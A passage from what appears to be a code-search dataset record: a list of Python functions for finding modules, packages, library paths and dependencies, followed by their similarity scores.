Despite the method\n # name, this method returns a loader rather than a module.\n elif hasattr(importer, 'find_module'):\n loader = importer.find_module(module_name)\n # Else, raise an exception.\n else:\n raise ImportError(\n \"Module %r importer %r loader unobtainable\" % (module_name, importer))\n\n # If this module is not loadable from this directory, continue.\n if loader is None:\n # self.msg(4, \"_find_module_path loader not found\", search_dir)\n continue\n\n # Absolute path of this module. If this module resides in a\n # compressed archive, this is the absolute path of this module\n # after extracting this module from that archive and hence\n # should not exist; else, this path should typically exist.\n pathname = None\n\n # If this loader defines the PEP 302-compliant get_filename()\n # method, preferably call that method first. Most if not all\n # loaders (including zipimporter objects) define this method.\n if hasattr(loader, 'get_filename'):\n pathname = loader.get_filename(module_name)\n # Else if this loader provides a \"path\" attribute, defer to that.\n elif hasattr(loader, 'path'):\n pathname = loader.path\n # Else, raise an exception.\n else:\n raise ImportError(\n \"Module %r loader %r path unobtainable\" % (module_name, loader))\n\n # If no path was found, this is probably a namespace package. In\n # such case, continue collecting namespace directories.\n if pathname is None:\n self.msg(4, \"_find_module_path path not found\", pathname)\n continue\n\n # Return such metadata.\n path_data = (pathname, loader)\n break\n # Else if this is a namespace package, return such metadata.\n else:\n if namespace_dirs:\n path_data = (namespace_dirs[0],\n NAMESPACE_PACKAGE(namespace_dirs))\n except UnicodeDecodeError as exc:\n self.msgout(1, \"_find_module_path -> unicode error\", exc)\n # Ensure that exceptions are logged, as this function is typically\n # called by the import_module() method which squelches ImportErrors.\n except Exception as exc:\n self.msgout(4, \"_find_module_path -> exception\", exc)\n raise\n\n # If this module was not found, raise an exception.\n self.msgout(4, \"_find_module_path ->\", path_data)\n if path_data is None:\n raise ImportError(\"No module named \" + repr(module_name))\n\n return path_data", "def list_dir(self, path):", "def _find_all_importables(pkg: ModuleType) -> List[str]:\n return sorted(\n set(\n chain.from_iterable(\n _discover_path_importables(Path(p), pkg.__name__)\n # FIXME: Unignore after upgrading to `mypy > 0.910`. 
The fix\n # FIXME: is in the `master` branch of upstream since Aug 4,\n # FIXME: 2021 but has not yet been included in any releases.\n # Refs:\n # * https://github.com/python/mypy/issues/1422\n # * https://github.com/python/mypy/pull/9454\n for p in pkg.__path__ # type: ignore[attr-defined]\n ),\n ),\n )", "def get_drivers(dirpath):\n\n return all_drivers", "def get_required_module_descriptors(self):\r\n return []", "def _iter_module_files():\n # The list call is necessary on Python 3 in case the module\n # dictionary modifies during iteration.\n for module in list(sys.modules.values()):\n if module is None:\n continue\n filename = getattr(module, \"__file__\", None)\n if filename:\n old = None\n while not os.path.isfile(filename):\n old = filename\n filename = os.path.dirname(filename)\n if filename == old:\n break\n else:\n if filename[-4:] in (\".pyc\", \".pyo\"):\n filename = filename[:-1]\n yield filename", "def modules_in_current_dir(path, module_name):\n yield from modules_from_path(Path(path).parent, module_name)", "def get_rpath_deps(pkg):\n if pkg.transitive_rpaths:\n return [d for d in pkg.spec.traverse(root=False, deptype=(\"link\"))]\n else:\n return pkg.spec.dependencies(deptype=\"link\")", "def _list_all(root_pkg, prog):\n res = \"\\n\".join(\n sorted(\n pkinspect.package_module_names(_import(root_pkg)),\n key=str.lower,\n ),\n )\n sys.stderr.write(f\"usage: {prog} module command [args...]\\nModules:\\n{res}\\n\")\n return 1", "def syspaths(self):\n res = []\n for path, jsmodule in self.jsmodules.items():\n if jsmodule.js_lib_path != \"\":\n js_lib_path = os.path.dirname(jsmodule.js_lib_path.rstrip(\"/\")) # get parent\n if not js_lib_path in res:\n res.append(js_lib_path)\n return res", "def _discover_path_importables(\n pkg_pth: Path, pkg_name: str,\n) -> Generator[str, None, None]:\n for dir_path, _d, file_names in os.walk(pkg_pth):\n pkg_dir_path = Path(dir_path)\n\n if pkg_dir_path.parts[-1] == '__pycache__':\n continue\n\n if all(Path(_).suffix != '.py' for _ in file_names):\n continue\n\n rel_pt = pkg_dir_path.relative_to(pkg_pth)\n pkg_pref = '.'.join((pkg_name,) + rel_pt.parts)\n yield from (\n pkg_path\n for _, pkg_path, _ in pkgutil.walk_packages(\n (str(pkg_dir_path),), prefix=f'{pkg_pref}.',\n )\n )", "def get_all_setups_roots():\n ta_roots = cmds.ls(\"*.{}\".format(CONFIG[\"config_attr\"]), r=True, o=True)\n return ta_roots", "def get_directories():\n # get current working dir\n directory = os.getcwd()\n # list of dir to look in repo for files\n directories = [\n directory,\n os.path.expanduser(os.path.join(directory, 'src')),\n os.path.expanduser(os.path.join(directory, 'tests'))\n ]\n return directories", "def findModule(name):", "def get_required_module_descriptors(self):\r\n descriptors = []\r\n for location in self.sources_list:\r\n try:\r\n descriptor = self.system.load_item(location)\r\n descriptors.append(descriptor)\r\n except ItemNotFoundError:\r\n msg = \"Invalid module by location.\"\r\n log.exception(msg)\r\n self.system.error_tracker(msg)\r\n\r\n return descriptors", "def mod_list(dir):\n\n modList = []\n modHash = {}\n isModule = False\n for ii in os.walk(dir):\n if ii[0] == dir:\n for f in ii[2]:\n # If there is no __init__ file, then the directory\n # upon which mod_list() is operating is not a module\n if f[0:8] == '__init__':\n isModule = True\n elif f[-3:] == '.py':\n modHash[f[:-3]] = True\n elif f[-4:] == '.pyc' or f[-4:] == '.pyo':\n modHash[f[:-4]] = True\n if isModule:\n modList = modHash.keys()\n modList.sort()\n return(modList)\n 
else:\n # Returning an empty list allows 'in' tests since a list is iterable,\n # and None isn't\n return([])", "def loadEtcDir(options, tags):\n etcdir = os.path.join(options.cdir, 'etc')\n # to import modules from the etc dir\n sys.path.append(etcdir)\n modules = {}\n for name in listConfigModules(etcdir):\n path = os.path.join(etcdir, name)\n module = loadConfigModule(name, options, tags)\n modules[path] = (module, os.path.getmtime(path))\n return modules", "def get_third_party_package_module_names():\n # type: () -> List[str]\n result = [] # type: List[str]\n\n def is_python_package(directory_path, file_path):\n # type: (str, str) -> Tuple[bool, Optional[str]]\n \"\"\"\n Return package name if the provided file path is a Python package, None otherwise.\n \"\"\"\n file_name = os.path.basename(file_path)\n init_file_path = os.path.join(file_path, \"__init__.py\")\n\n if os.path.isdir(file_path) and os.path.isfile(init_file_path):\n # Package\n return (True, file_name)\n\n return (False, None)\n\n def is_python_module(directory_path, file_path):\n # type: (str, str) -> Tuple[bool, Optional[str]]\n \"\"\"\n Return module name if the provided file path is a Python module, None otherwise.\n \"\"\"\n if (\n os.path.isfile(file_path)\n and file_path.endswith(\".py\")\n and file_name != \"__init__.py\"\n ):\n # Single file module (e.g. six.py)\n module_name = file_name.replace(\".py\", \"\")\n return (True, module_name)\n\n return (False, None)\n\n for directory_path in THIRD_PARTY_DIRECTORIES:\n file_names = os.listdir(directory_path)\n\n for file_name in file_names:\n file_path = os.path.join(directory_path, file_name)\n\n python_package, package_name = is_python_package(directory_path, file_path)\n python_module, module_name = is_python_module(directory_path, file_path)\n\n if python_package and package_name:\n result.append(package_name)\n elif python_module and module_name:\n result.append(module_name)\n\n return result", "def __dir__(self) -> List[str]:\n self._try_setup()\n return object.__dir__(self) # pytype: disable=attribute-error", "def find_packages( root ):\n for path, directories, files in os.walk( root ):\n if is_package( path ):\n yield path.replace( '/','.' )", "def selected_lib_roots(args: Namespace) -> List[str]:\n return [LIB_ROOTS[lib] for lib in selected_libs(args)]", "def checkForDependencies(self):\n\n # This method will check our module for any attached modules\n modules = self.getAllModules\n joints = self.returnCreatedJoints\n\n attachedMods = []\n instances = {}\n\n for inst in self.rigUiInst.moduleInstances:\n networkNode = inst.returnNetworkNode\n instances[networkNode] = inst\n\n for module in modules:\n parentJoint = cmds.getAttr(module + \".parentModuleBone\")\n moduleName = cmds.getAttr(module + \".moduleName\")\n if parentJoint in joints:\n instance = instances.get(module)\n attachedMods.append([module, parentJoint, moduleName, instance])\n\n return attachedMods", "def _list_modules():\r\n return [\r\n desc.module_class\r\n for desc\r\n in _list_descriptors()\r\n ]", "def walk_modules(path):\n\n mods = []\n mod = import_module(path)\n mods.append(mod)\n if hasattr(mod, '__path__'):\n for _, subpath, ispkg in iter_modules(mod.__path__):\n fullpath = path + '.' 
+ subpath\n if ispkg:\n mods += walk_modules(fullpath)\n else:\n submod = import_module(fullpath)\n mods.append(submod)\n return mods", "def find_path():\n __dir_path__ = os.path.dirname(os.path.realpath(__file__))\n return __dir_path__", "def scan_morepath_modules(cls: type[morepath.App]) -> None:\n for module in sorted(morepath_modules(cls)):\n morepath.scan(import_module(module))", "def _find_module_files(rootDir: str, simpleFilenames: List[str])\\\n -> Set[str]:\n\n moduleFiles = set()\n\n for root, dirs, _ in os.walk(rootDir):\n for dirObj in dirs:\n dir = str(dirObj)\n if not dir.startswith(MODULE_DIR_PREFIX):\n continue\n\n dirPath = join(root, dir)\n moduleFile = _any_file_exists(dirPath, simpleFilenames)\n if moduleFile:\n moduleFiles.add(moduleFile)\n\n return moduleFiles", "def get_all_modules(package):\n base = Path(inspect.getabsfile(package)).parent\n\n for fl in base.glob(\"*.py\"):\n print(f\"loading module {fl}\")\n yield load_module(fl)", "def get_required_module_descriptors(self):\r\n\r\n # If use_for_single_location is True, this is linked to an open ended problem.\r\n if self.use_for_single_location:\r\n # Try to load the linked module.\r\n # If we can't load it, return empty list to avoid exceptions on progress page.\r\n try:\r\n linked_module = self.system.load_item(self.link_to_location)\r\n return [linked_module]\r\n except (NoPathToItem, ItemNotFoundError):\r\n error_message = (\"Cannot find the combined open ended module \"\r\n \"at location {0} being linked to from peer \"\r\n \"grading module {1}\").format(self.link_to_location, self.location)\r\n log.error(error_message)\r\n return []\r\n else:\r\n return []", "def find(self):\n extension_hooks = list()\n eggs = find_eggs(self.rootDir)\n factory = EggPMExtensionFactory()\n for egg in eggs:\n # Add egg to path so other parts of pylabs can import its contents\n eggfile = egg.location\n sys.path.append(eggfile)\n for filePointer, path in self._generateExtensionConfigFilePointers(eggfile):\n inifile = pylabs.inifile.IniFile(filePointer)\n hooks = self._getHookInformation(inifile, path, factory)\n extension_hooks.extend(hooks)\n return extension_hooks", "def find_config_dirs(project=None, prog=None, extension='.conf.d'):\n return _find_config_files(project, prog, extension)", "def get_candidate_paths():\n yield get_linked_libpython()\n\n # List candidates for directories in which libpython may exist\n config_vars = \"LIBPL\", \"srcdir\", \"LIBDIR\"\n lib_dirs = list(map(sysconfig.get_config_var, config_vars))\n\n if is_windows():\n lib_dirs.append(os.path.join(os.path.dirname(sys.executable)))\n else:\n lib_dirs.append(os.path.join(\n os.path.dirname(os.path.dirname(sys.executable)),\n \"lib\"))\n\n # For macOS:\n lib_dirs.append(sysconfig.get_config_var(\"PYTHONFRAMEWORKPREFIX\"))\n\n lib_dirs.append(sys.exec_prefix)\n lib_dirs.append(os.path.join(sys.exec_prefix, \"lib\"))\n\n lib_basenames = list(get_candidate_names())\n\n for directory in filter(bool, lib_dirs):\n for basename in lib_basenames:\n yield os.path.join(directory, basename)\n\n # In macOS and Windows, ctypes.util.find_library returns a full path:\n for basename in lib_basenames:\n yield ctypes.util.find_library(get_library_name(basename))", "def getpaths(self,libname):\n if os.path.isabs(libname):\n yield libname\n else:\n # FIXME / TODO return '.' 
and os.path.dirname(__file__)\n for path in self.getplatformpaths(libname):\n yield path\n\n path = ctypes.util.find_library(libname)\n if path: yield path", "def getpaths(self,libname):\n if os.path.isabs(libname):\n yield libname\n else:\n # FIXME / TODO return '.' and os.path.dirname(__file__)\n for path in self.getplatformpaths(libname):\n yield path\n\n path = ctypes.util.find_library(libname)\n if path: yield path", "def _get_external_libraries(self, dom, type='CLASSES'):\n module = dom.getElementsByTagName('module')[0]\n components = module.getElementsByTagName('component')\n for component in components:\n if component.getAttribute('name') == 'NewModuleRootManager':\n for orderEntry in component.getElementsByTagName('orderEntry'):\n for library in orderEntry.getElementsByTagName('library'):\n if library.getAttribute('name') == 'external':\n for library_type in library.getElementsByTagName(type):\n return library_type.getElementsByTagName('root')\n return None", "def modules(self):\n return self._modules.keys()", "def get_deps_path(root):\n app_root = os.path.join(root, DEPS_PATTERN)\n files = glob.glob(app_root)\n if len(files) != 1:\n return None\n return files[0]", "def get_provider_yaml_paths():\n return sorted(glob(f\"{ROOT_DIR}/airflow/providers/**/provider.yaml\", recursive=True))", "def get_LCtodo(loc=BASE):\n toproc = []\n for ff in Path(loc).glob(\"**/*.d/import*.mscf\"):\n if (ff.parent/'ser').exists():\n toproc.append(ff)\n if DEBUG: \n print('get_LCtodo')\n pprint([str(i.parent.name) for i in toproc])\n return toproc", "def _get_compile_cache_dep_files():\n if entry_script_path is None:\n logger.warning(\"Can not get the entry script file path.\")\n return []\n compile_cache_dep_files = []\n logger.debug(f\"entry script file path: {entry_script_path}\")\n compile_cache_dep_files.append(entry_script_path)\n __get_compile_cache_dep_files(entry_script_path, compile_cache_dep_files, None)\n return compile_cache_dep_files", "def get_tests():\n\tret = []\n\tfor walk_tuple in os.walk(webnotes.defs.modules_path):\n\t\tfor test_file in filter(lambda x: x.startswith('test') and x.endswith('.py'), walk_tuple[2]):\n\t\t\tdir_path = os.path.relpath(walk_tuple[0], webnotes.defs.modules_path)\n\t\t\tif dir_path=='.':\n\t\t\t\tret.append(test_file[:-3])\n\t\t\telse:\n\t\t\t\tret.append(dir_path.replace('/', '.') + '.' 
+ test_file[:-3])\t\t\t\n\treturn ret", "def find_kem_dirs(basename):\n # TODO: assume script run from project root\n upstream_dir = 'src/kem/{}/upstream'\n kem_dirs = []\n\n # TODO; find api.h files to enable generation of wrapper code\n for dirpath, _, filenames in os.walk(upstream_dir.format(basename)):\n if 'api.h' in filenames:\n kem_dirs.append(dirpath)\n\n if not kem_dirs:\n msg = 'api.h not found in subdirs of {}'.format(upstream_dir)\n raise oqs.KemException(msg)\n\n return kem_dirs", "def get_dependencies_content():\n import trustedanalytics\n dependencies = []\n for filename in trustedanalytics.udf_dependencies:\n name, content = _get_file_content_as_str(filename)\n dependencies.append({'file_name': name, 'file_content': content})\n return dependencies", "def get_all_test_modules():\n test_modules = []\n current_directory = os.path.dirname(__file__)\n sys.path.insert(0, os.path.join(current_directory, '..'))\n files = sorted(os.listdir(current_directory))\n for file in files:\n if file.startswith('test') and file.endswith('.py'):\n test_modules.append(file.rstrip('.py'))\n\n return test_modules", "def get_dependencies(self):\n dependencies = self._dependencies\n if self.ansible is not None:\n dependencies.append(\"ansible=={}.*\".format(self.ansible))\n else:\n dependencies.append(\"ansible\")\n # Drivers can have their own dependencies\n if self.scenario.driver is not None \\\n and self.scenario.driver in DRIVER_DEPENDENCIES.keys():\n dependencies.extend(DRIVER_DEPENDENCIES[self.scenario.driver])\n # Scenarios can specify a requirements.txt\n if self.scenario.requirements is not None:\n dependencies.append(\"-r\" + self.scenario.requirements)\n return dependencies", "def get_cl_include():\n\n PYSPH_ROOT = get_pysph_root()\n\n inc_dir = ['-I'+path.join(PYSPH_ROOT, 'base'),\n '-I'+path.join(PYSPH_ROOT, 'solver'), ]\n\n return inc_dir" ]
[ "0.65620816", "0.63926107", "0.6388437", "0.63874215", "0.6298563", "0.6170511", "0.6139222", "0.6134263", "0.6119241", "0.61146545", "0.608592", "0.6056361", "0.603119", "0.6020695", "0.5978215", "0.5966075", "0.5961092", "0.5923319", "0.5875171", "0.5873686", "0.58671385", "0.5861534", "0.585865", "0.5849939", "0.58458", "0.58162546", "0.5793757", "0.5763414", "0.57381886", "0.57321966", "0.5730651", "0.5726441", "0.56796294", "0.56707853", "0.5630973", "0.55979466", "0.5584999", "0.55588514", "0.55581486", "0.55458415", "0.55433863", "0.5540886", "0.5537447", "0.5527226", "0.55236125", "0.5522153", "0.5517422", "0.55063343", "0.5500828", "0.548126", "0.54809475", "0.54718846", "0.546732", "0.546724", "0.545434", "0.54529965", "0.54517764", "0.5446728", "0.54447585", "0.5436942", "0.5430284", "0.5417143", "0.54136235", "0.5394653", "0.5394266", "0.5391366", "0.5382649", "0.5380439", "0.5377442", "0.537491", "0.53731126", "0.5372933", "0.5366835", "0.5354331", "0.53535616", "0.5349552", "0.5343215", "0.5339933", "0.53374213", "0.5336671", "0.5335013", "0.5332925", "0.5330616", "0.53304255", "0.5324295", "0.5323345", "0.531754", "0.531754", "0.5309154", "0.53038186", "0.530372", "0.5292045", "0.5289764", "0.52836525", "0.5279171", "0.5278824", "0.5277094", "0.5269079", "0.52675396", "0.5266085" ]
0.76784027
0
Update the symbol XML node
def edit_symbol_node(node, filename): size = int(re.findall('\d+', filename)[-1]) log.info('New filename %s; size %s', filename, size) node.set('typeId', SYMBOL_ID) node.find('name').text = 'DLS symbol' # Use PV name from rule in control PV for tooltip etc. # Reference that PV in rule to avoid duplication. pv_name = node.find('.//pv').text pv_element = et.Element('pv_name') pv_element.text = pv_name node.append(pv_element) node.find('.//pv').text = '$(pv_name)' rule_element = node.find('.//rule') rule_element.set('prop_id', 'image_index') rule_element.set('out_exp', 'true') file_element = et.Element('image_file') file_element.text = filename num_element = et.Element('symbol_number') num_element.text = '0' img_size_element = et.Element('sub_image_width') img_size_element.text = str(size) node.append(file_element) node.append(num_element) node.append(img_size_element) node.remove(node.find('opi_file'))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_symbol(self, symbol):\r\n self.symbol = symbol", "def symbol(self, symbol):\n self._symbol = symbol", "def symbol(self, symbol):\n\n self._symbol = symbol", "def set_symbol(self, row, col, symbol):\n self.field[row, col] = symbol", "def setSymbolProps(self, name, symbol):\r\n self.symbolProps = autosar.base.SymbolProps( str(name), str(symbol))", "def setElementsCoordinates(self, symbol, x, y):\n #If it is the start element\n if symbol == \"D\":\n self._set_start((x,y))\n\n #If it is the end of the level element\n elif symbol == \"F\":\n self._set_end((x,y))\n\n #If it is a spike\n elif symbol == \"S\":\n self._get_spikes().append((x,y))\n \n #If it is a scroll\n elif symbol == \"P\":\n self._get_scrolls().append((x,y))\n\n #If it is a key\n elif symbol == \"K\":\n self._get_keys().append((x,y))", "def create_simple_symbol(xml_document, symbols_element, properties, count, alpha, tags=None):\n symbol_element = xml_document.createElement(\"symbol\")\n symbol_element.setAttribute(\"alpha\", alpha)\n symbol_element.setAttribute(\"clip_to_extent\", \"1\")\n symbol_element.setAttribute(\"type\", properties['symbol_type'])\n symbol_element.setAttribute(\"name\", unicode(count))\n if tags and len(tags) > 0:\n symbol_element.setAttribute(\"tags\", tags)\n symbols_element.appendChild(symbol_element)\n\n for layer in reversed(properties['layer']):\n renderer_layer_element = xml_document.createElement(\"layer\")\n renderer_layer_element.setAttribute(\"pass\", \"0\")\n renderer_layer_element.setAttribute(\"enabled\", \"1\")\n renderer_layer_element.setAttribute(\"locked\", \"0\")\n renderer_layer_element.setAttribute(\"class\", layer['simpleSymbolClass'])\n symbol_element.appendChild(renderer_layer_element)\n\n for key, value in layer['dict_symbols'].items():\n\n symbol_properties_element = xml_document.createElement(\"prop\")\n symbol_properties_element.setAttribute(\"k\", unicode(key))\n symbol_properties_element.setAttribute(\"v\", unicode(value))\n renderer_layer_element.appendChild(symbol_properties_element)\n\n data_defined_properties_element = xml_document.createElement(\"data_defined_properties\")\n renderer_layer_element.appendChild(data_defined_properties_element)\n\n data_defined_option_element = xml_document.createElement(\"Option\")\n data_defined_option_element.setAttribute(\"type\", \"Map\")\n data_defined_properties_element.appendChild(data_defined_option_element)\n\n data_defined_option_value_element = xml_document.createElement(\"Option\")\n data_defined_option_value_element.setAttribute(\"value\", \"\")\n data_defined_option_value_element.setAttribute(\"type\", \"QString\")\n data_defined_option_value_element.setAttribute(\"name\", \"name\")\n data_defined_option_element.appendChild(data_defined_option_value_element)\n\n data_defined_option_name_element = xml_document.createElement(\"Option\")\n data_defined_option_name_element.setAttribute(\"name\", \"properties\")\n data_defined_option_element.appendChild(data_defined_option_name_element)\n\n data_defined_option_collection_element = xml_document.createElement(\"Option\")\n data_defined_option_collection_element.setAttribute(\"value\", \"collection\")\n data_defined_option_collection_element.setAttribute(\"type\", \"QString\")\n data_defined_option_collection_element.setAttribute(\"name\", \"type\")\n data_defined_option_element.appendChild(data_defined_option_collection_element)\n\n if 'subSymbol' in layer:\n SimpleSymbol.create_simple_symbol(xml_document, renderer_layer_element, layer['subSymbol'], \"@0@0\", '1')", "def 
add_symbol(self, symbol_name: str, attrs: dict = None):\n if attrs is None:\n attrs = {}\n self.current_level().add_symbol(symbol_name, attrs)\n # print(f'After add {symbol_name}, symbol_table is:\\n{self}')", "def updateGraph(self, symbol=None):\n if symbol is None:\n return\n\n # Get all stock data back for the given symbol\n self.stock_data = self.db.queryAllData(table_name=symbol)\n\n # Create a list of prices and a list of dates\n self.prices = [x[1].strip('$') for x in self.stock_data]\n self.dates = [x[0] for x in self.stock_data]\n date_string = [x.strftime(\"%m/%d/%Y\") for x in self.dates]\n self.x = [datetime.datetime.strptime(d, '%m/%d/%Y').date()\n for d in date_string]\n\n # Create an instance of QtMpl\n self.mpl = self.central.mpl\n self.mpl.addLine(x=self.x, y=self.prices, title=symbol)", "def symbol_id(self, value: str):\n self._symbol = value", "def put(self, name_symbol=None, name=None, symbol=None):\n putted_symbl = super(ElemModule.ModuleSymTab, self).put(name_symbol=name_symbol, name=name, symbol=symbol)\n if isinstance(putted_symbl, ElemPort):\n self.module.add_io_decl(putted_symbl)", "def _set_symbol(self, symbol, blank=False):\n self._symbols.add(symbol)\n\n try:\n assert self._blank_symbol == None or not blank\n if blank:\n self._blank_symbol = symbol\n except:\n raise Exception(\n f\"Machine got blank symbol '{symbol}' which is already set to '{self._blank_symbol}'\"\n )", "def __setitem__(self, name, symbol):\n self.current_scope[name] = symbol", "def updateOffset(self):\n raise Exception(\"Unimplemented function in symbol: \"+self.name)", "def put_symbol(self, symbol, row, column):\n\n self.board[row][column] = symbol", "def getMappedSymbolsXML(self, addrstring: unicode) -> unicode:\n ...", "def setSymbol(self, *args):\n return _libsbml.InitialAssignment_setSymbol(self, *args)", "def addPair(self, symbol, address):\r\n self.s_table[symbol] = address", "def update_qml(self, qml):\n if qml is None:\n return qml\n\n try:\n # parse XML\n root = ElementTree.fromstring(qml)\n\n # embed symbols\n self.embed_qml_symbols(root, 'SvgMarker', 'name')\n self.embed_qml_symbols(root, 'SVGFill', 'svgFile')\n self.embed_qml_symbols(root, 'RasterFill', 'imageFile')\n\n # return updated QML\n qml = ElementTree.tostring(\n root, encoding='utf-8', method='xml'\n )\n return qml.decode()\n except Exception as e:\n self.logger.warning(\n \"Could not embed QML symbols:\\n%s\" % e\n )\n return qml", "def add_symbol_attribute(self, symbol_attribute):\n self.symbol_attributes.append(symbol_attribute)", "def update_node(self, uri, xmlnode):\n oldnode = self.sm.get_node(uri)\n if len(oldnode) == 0: raise VOSpaceError(404, 'A Node does not exist with the requested URI.')\n oldnode = self.nf.get_node(oldnode[0]['node'])\n newnode = self.nf.get_node(xmlnode)\n # Check properties\n for property in newnode.properties:\n if property in READ_ONLY_PROPERTIES: raise VOSpaceError(401, 'User does not have permissions to set a readonly property.', summary = PERMISSION_DENIED)\n if property in oldnode.properties: \n oldnode.properties[property] = newnode.properties[property]\n else:\n oldnode.add_property(property, newnode.properties[property])\n # Delete properties if applicable\n props = xmlnode.xpath('//vos:property[@xsi:nil = \"true\"]', namespaces = {'vos': VOSPACE_NS, 'xsi': XSI_NS})\n for prop in props:\n del oldnode.properties[prop.get('uri')]\n # Store update\n self.sm.update_node(oldnode.uri, oldnode.uri, oldnode.tostring())\n return oldnode.tostring()", "def MakeSymbolName(self,content):\n 
return self.register(SymbolName(content,reg=self))", "def append_state_label(symbol):\n\t\tif symbol == \"c\":\n\t\t\tself.state_label = self.state_label.replace(\"o\", \"\")\n\t\tif symbol == \"d\":\n\t\t\tself.state_label = self.state_label.replace(\"k\", \"\")\n\t\telse:\n\t\t\tself.state_label += symbol", "def update_node(node, attribute, value):\n node.set(attribute, value)\n return", "def add_symbol(self):\n default_state = \"New State\"\n default_file = \"New File\"\n\n row = self.tbl_symbols.rowCount()\n self.tbl_symbols.insertRow(row)\n self.lst_state_item = QtWidgets.QTableWidgetItem(default_state)\n self.tbl_symbols.setItem(row, 0, self.lst_state_item)\n self.lst_file_item = QtWidgets.QTableWidgetItem(default_file)\n self.tbl_symbols.setItem(row, 1, self.lst_file_item)\n\n self.symbols[default_state] = default_file\n self.tbl_symbols.setCurrentItem(self.lst_file_item)\n self.load_from_list()\n self.txt_state.setFocus()", "def visit_text(self, sytext):\n self.current.update(sytext)", "def visit_text(self, sytext):\n self.current.update(sytext)", "def update(self):\n if not self._update:\n return\n\n self._update = False\n stru = self.stru\n sgn = stru.space_group().match_tabulated_settings().number()\n\n # Create the symmetry object\n symm = crystal.symmetry(\n unit_cell = self.unitcell._latpars,\n space_group_symbol = sgn\n )\n\n # Now the new structure\n newstru = stru.__class__(\n crystal_symmetry = symm,\n scatterers = stru.scatterers()\n )\n\n self.unitcell._latpars = list(newstru.unit_cell().parameters())\n\n self.stru = newstru\n return", "def write_symbol(self, new_tape_symbol: str) -> Self:\n tape_elements = list(self.tape)\n tape_elements[self.current_position] = new_tape_symbol\n return self.__class__(\n tape_elements,\n blank_symbol=self.blank_symbol,\n current_position=self.current_position,\n )", "def replace_symbols(node, symbols):\n warning = False\n\n if len(node) == 0:\n if node.text is not None and not node.text.isspace():\n if '$' in node.text and not (node.tag in EXCLUDED_TAGS):\n node.text = try_replace(node.text, symbols)\n\n if node.tag in NON_PV_TAGS:\n warning = True\n else:\n for child in node:\n if replace_symbols(child, symbols):\n warning = True\n\n return warning", "def _update_node(node, value):\n node.N += 1\n node.W += value\n node.Q = node.W / node.N", "def changeTo(self, oldSymbol, newSymbol):\n for x in range(0, len(self.tape)):\n if self.tape[x] == oldSymbol:\n self.tape[x] = newSymbol", "def __setitem__(self, key, item):\n self.attrib[key] = item", "def __setitem__(self, key, item):\n self.attrib[key] = item", "def embed_qml_symbols(self, root, layer_class, prop_key):\n for svgprop in root.findall(\".//layer[@class='%s']/prop[@k='%s']\" %\n (layer_class, prop_key)):\n symbol_path = svgprop.get('v')\n path = os.path.abspath(\n os.path.join(QGS_RESOURCES_DIR, symbol_path)\n )\n\n # NOTE: assume symbols not included in ZIP are default symbols\n if os.path.exists(path):\n try:\n # read symbol data and convert to base64\n with open(path, 'rb') as f:\n symbol_data = base64.b64encode(f.read())\n\n # embed symbol in QML\n svgprop.set('v', \"base64:%s\" % symbol_data.decode())\n self.logger.info(\"Embed symbol in QML: %s\" % symbol_path)\n except Exception as e:\n self.logger.warning(\n \"Could not embed QML symbol %s:\\n%s\" % (symbol_path, e)\n )", "def set_symbols(self, symboltable: dict):\n\n for index in range(1, self.symbol_layout.rowCount()):\n self.symbol_layout.removeRow(index)\n\n font = QFont('Fira Code', 8, QFont.Medium)\n for entry in 
symboltable:\n symbol = QLineEdit()\n symbol.setReadOnly(True)\n symbol.setText(entry)\n symbol.setFont(font)\n address = QLineEdit()\n address.setReadOnly(True)\n address.setFont(font)\n address.setText(str(symboltable[entry]))\n self.symbol_layout.addRow(address, symbol)", "def currency_symbol_should_change_with_currency(self, currency, symbol):\n self.change_currency(currency)\n assert self.wait_for_element(*self.CURRENCY_SYMBOL).text == symbol, \"Currency symbol haven't changed\"", "def element(self, new_element: str) -> None:\n sfac = self.shx.elem2sfac(new_element)\n if sfac == 0:\n self.shx.sfac_table.add_element(new_element)\n sfac = self.shx.elem2sfac(new_element)\n self.sfac_num = sfac", "def update(self, xact, path, msg):\n self._log.debug(\"Updating VNFR xact = %s, %s:%s\",\n xact, path, msg)\n self.regh.update_element(path, msg)\n self._log.debug(\"Updated VNFR xact = %s, %s:%s\",\n xact, path, msg)", "def _update_sym_const(self,name,G1,remove_nodes,new_inst, const_list):\n logger.debug(f\"updating symmetry block constraints of subcircuit {name}, nodes: {remove_nodes}, new name: {new_inst}\")\n if self._if_const(name):\n for const in const_list:\n if hasattr(const, 'pairs'):\n for pair in const.pairs:\n if len(pair) == 2:\n if pair[0] in remove_nodes and pair[1] in remove_nodes:\n pair[0] = new_inst\n pair.pop()\n logger.debug(f\"updated symmetric pair constraint to self symmetry:{const}\")\n elif pair[0] in remove_nodes and pair[1] not in remove_nodes:\n pair[0] = new_inst\n elif pair[1] in remove_nodes and pair[0] not in remove_nodes:\n pair[1] = new_inst\n elif len(pair) == 1:\n if pair[0] in remove_nodes:\n pair[0] = new_inst\n logger.debug(f\"updated symmetric pair constraint to self symmetry:{const}\")", "def setStruct(self, sym):\n self.sym = sym", "def add_symbol(self, symbol):\n self.symbols_list.append(symbol)\n self.symbols_list.sort()", "def update(self, opponent_action, player_action):\n\n self.root = self.root.make_updated_node(player_action, opponent_action)", "async def on_symbol_specification_updated(self, specification: MetatraderSymbolSpecification):\n for i in range(len(self._specifications)):\n if self._specifications[i]['symbol'] == specification['symbol']:\n self._specifications[i] = specification\n break\n else:\n self._specifications.append(specification)\n self._specificationsBySymbol[specification['symbol']] = specification", "def add(self, symbol, value):\n if symbol in self.symbol_map:\n raise ValueError(f\"symbol {symbol} already exists in map.\")\n self.symbol_map[symbol] = value", "def update_holding_data(holding,new_call):\n holding_data = ET.fromstring(holding)\n location_field =holding_data.find(\".//datafield[@tag='852']\")\n location_field.set('ind1', ' ')\n call_subfield = holding_data.find(\".//datafield[@tag='852']/subfield[@code='h']\")\n call_subfield.text = new_call\n return ET.tostring(holding_data)", "def add_symbol(self, x, is_global=False):\n if is_global:\n self.global_symbols[x.name] = x\n self.global_symbols[x.name].addr = self.global_addr\n self.global_symbols[x.name].isglobal = True\n if x.type != 'procedure':\n self.global_addr += x.size\n else:\n addr = self.local_symbols_size() + self.local_param_size()\n self.symbols[-1][x.name] = x\n self.symbols[-1][x.name].addr = addr", "def updateScore(self, node, addToScore):\n currentScore = 0\n scoreString = node.attrib.get('gravityScore')\n if scoreString:\n currentScore = int(scoreString)\n \n newScore = currentScore + addToScore\n node.set(\"gravityScore\", str(newScore))", "def 
